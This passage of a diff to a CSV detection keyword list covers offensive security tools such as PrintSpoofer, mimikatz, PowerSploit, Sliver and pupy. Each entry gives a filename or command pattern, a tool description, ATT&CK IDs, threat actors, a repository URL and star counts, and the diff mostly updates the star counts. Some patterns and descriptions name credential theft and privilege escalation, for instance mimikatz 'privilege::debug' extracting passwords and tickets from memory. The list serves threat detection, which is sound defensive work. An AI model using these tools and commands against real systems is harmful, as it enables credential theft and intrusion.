Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*printnightmare_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*printspoofer -Command*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*PrintSpoofer-*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*PrintSpoofer.*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" -"*PrintSpoofer.cpp*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer.cpp*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*printspoofer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*printspoofer.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*PrintSpoofer.sln*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.sln*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*PrintSpoofer_x64.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*PrintSpoofer32.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer32.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer64.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer64.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer-master*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*PrintSpoofer-master*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*Priv Esc Check Bof*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*priv/priv_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*priv/priv_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*privcheck.cna*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*privcheck32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivEditor.dll*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*Privesc.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Privesc.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*privesc_checker*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*privesc_checker.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Privesc.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Privesc.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*privesc_checker*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*privesc_checker.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*privesc_juicy_potato.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*privesc_powerup.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*privesc-check*","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","10","1394","336","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z" -"*PrivescCheck.ps1*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*PrivescCheck_*.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*PrivescCheckAsciiReport*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheck.ps1*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheck_*.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheckAsciiReport*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*PrivEscManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*privexchange.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*privexchange.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" @@ -15114,16 +15282,16 @@ "*PrivExchange-master.zip*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*PrivFu-main.zip*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*PrivFu-master*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*privilege::backup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::debug*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::debug*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::driver*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::id*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*privilege::name*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 